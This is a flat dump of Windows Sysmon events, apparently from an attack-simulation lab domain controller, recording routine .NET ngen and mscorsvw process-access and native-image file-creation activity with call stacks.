13:22:34.810{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-459A-6000-6002-000000009A01}3064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:34.794{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-459A-6000-6002-000000009A01}3064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:34.794{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-459A-6000-6002-000000009A01}3064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:34.403{08A6967A-458F-6000-5F02-000000009A01}4980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1374-0\System.Data.Entity.dll2021-01-14 13:22:34.403 11241100x80000000000000006521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:35.950{08A6967A-459B-6000-6102-000000009A01}1472C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\5c0-0\System.Data.Entity.Design.dll2021-01-14 13:22:35.950 10341000x80000000000000006520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:35.028{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-459B-6000-6102-000000009A01}1472C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:35.013{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-459B-6000-6102-000000009A01}1472C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:35.013{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-459B-6000-6102-000000009A01}1472C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:36.200{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-459C-6000-6302-000000009A01}1396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:36.185{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-459C-6000-6302-000000009A01}1396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:36.185{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-459C-6000-6302-000000009A01}1396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:36.044{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-459C-6000-6202-000000009A01}2200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:36.044{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-459C-6000-6202-000000009A01}2200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:36.044{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-459C-6000-6202-000000009A01}2200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:38.466{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-459E-6000-6502-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:38.451{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-459E-6000-6502-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:38.451{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-459E-6000-6502-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:38.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-459E-6000-6402-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:38.263{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-459E-6000-6402-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:38.263{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-459E-6000-6402-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:38.154{08A6967A-459C-6000-6302-000000009A01}1396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\574-0\System.Data.Linq.dll2021-01-14 13:22:38.154 10341000x80000000000000006541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:39.810{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-459F-6000-6702-000000009A01}2444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:39.810{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-459F-6000-6702-000000009A01}2444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:39.810{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-459F-6000-6702-000000009A01}2444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:39.419{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-459F-6000-6602-000000009A01}3408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:39.404{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-459F-6000-6602-000000009A01}3408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:39.404{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-459F-6000-6602-000000009A01}3408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:39.326{08A6967A-459E-6000-6502-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\36c-0\System.Data.OracleClient.dll2021-01-14 13:22:39.326 10341000x80000000000000006548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 